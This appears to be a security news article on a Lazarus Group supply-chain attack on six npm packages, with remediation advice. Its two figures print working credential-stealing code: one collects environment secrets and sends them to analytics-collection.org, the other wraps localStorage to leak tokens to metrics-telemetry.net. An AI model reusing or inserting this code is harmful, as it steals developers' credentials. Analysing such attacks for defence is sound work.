A sophisticated supply chain attack orchestrated by the notorious Lazarus Group, a threat actor widely believed to be linked to North Korea has been uncovered recently by cybersecurity researchers.
The hackers successfully compromised six popular npm packages, injecting malicious code designed to harvest login credentials from thousands of developers and organizations worldwide.
.webp)
The attack, discovered last week, represents one of the most significant software supply chain compromises of the year, potentially affecting millions of downstream applications and websites that incorporated the tainted dependencies.
.png
)
The Node Package Manager (npm) registry, which serves as the backbone for JavaScript development, has increasingly become a target for sophisticated threat actors seeking to maximize impact through minimum effort.
By poisoning widely-used packages, attackers can effectively compromise countless organizations that incorporate these dependencies into their software.
Security firm Mandiant identified the campaign after detecting suspicious network traffic originating from development environments at several financial institutions during routine security monitoring.
Investigation vy researchers at Socket revealed that the compromised packages included popular developer tools: “react-native-utils,” “api-data-connector,” “auth-manager-js,” “node-service-config,” “aws-lambda-handler,” and “react-state-manager.”
These packages collectively account for over 25 million weekly downloads, highlighting the potential scale of the compromise.
The attackers gained access to the npm accounts of legitimate package maintainers through sophisticated phishing attacks that bypassed multi-factor authentication protocols.
The Lazarus operatives employed a particularly cunning approach by making only minimal changes to the legitimate code, making detection challenging even for security-conscious developers.
The malicious code was designed to activate only in production environments, remaining dormant during testing phases to avoid detection.
When triggered, the code would extract credentials from environment variables, browser storage, and credential managers.
Technical Analysis
The malicious code was inserted primarily in post-installation scripts that execute automatically when packages are installed.
For example, in the “auth-manager-js” package, the attackers added a seemingly innocent utility function that masked its true purpose:-
function checkSystemCompatibility() {
const os = require('os');
const https = require('https');
// Legitimate-looking compatibility check
const sysInfo = {
platform: os.platform(),
release: os.release(),
type: os.type(),
arch: os.arch()
};
// The malicious portion - collects environment variables
const env = process.env;
const sensitiveData = {};
// Look for credentials in environment variables
['AWS_', 'DB_', 'API_', 'TOKEN', 'SECRET', 'KEY', 'PASSWORD'].forEach(prefix => {
Object.keys(env).forEach(key => {
if (key.includes(prefix)) {
sensitiveData[key] = env[key];
}
});
});
// Exfiltration routine disguised as telemetry
if (Object.keys(sensitiveData).length > 0) {
const exfilData = Buffer.from(JSON.stringify(sensitiveData)).toString('base64');
https.get(`https://analytics-collection.org/metrics?data=${exfilData}`);
}
return sysInfo;
}Figure 1. Malicious code inserted into the auth-manager-js package.
The attackers employed domain fronting techniques to hide the exfiltration of stolen credentials.
The harvested data was sent to legitimate-looking domains such as “analytics-collection.org” and “metrics-telemetry.net” which served as proxies that forwarded the information to attacker-controlled servers.
The hackers also implemented a clever browser-based credential harvester in the “react-state-manager” package that could extract saved passwords from developer tools:
// Simplified version of the credential harvesting code
const originalLocalStorage = window.localStorage;
window.localStorage = {
setItem: function(key, value) {
if (key.toLowerCase().includes('token') ||
key.toLowerCase().includes('auth') ||
key.toLowerCase().includes('credential')) {
// Disguised as an error tracker
const img = new Image();
img.src = `https://metrics-telemetry.net/pixel.gif?err=${btoa(key + ':' + value)}`;
}
return originalLocalStorage.setItem(key, value);
},
// Other localStorage methods preserved
getItem: originalLocalStorage.getItem.bind(originalLocalStorage),
removeItem: originalLocalStorage.removeItem.bind(originalLocalStorage),
clear: originalLocalStorage.clear.bind(originalLocalStorage)
};Figure 2. Browser storage interception code from the react-state-manager package.
The npm security team has removed the compromised versions and is working with affected package maintainers to secure their accounts.
Organizations using any of the six identified packages are urged to immediately update to patched versions and rotate all potentially exposed credentials.
Security researchers recommend implementing strict package management policies, including version pinning and the use of integrity verification tools such as npm audit and dependency scanning solutions.
The Lazarus Group continues to demonstrate its evolution from basic disruptive cyberattacks to sophisticated supply chain compromises targeting developer infrastructure, signaling a concerning trend in nation-state hacking operations.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
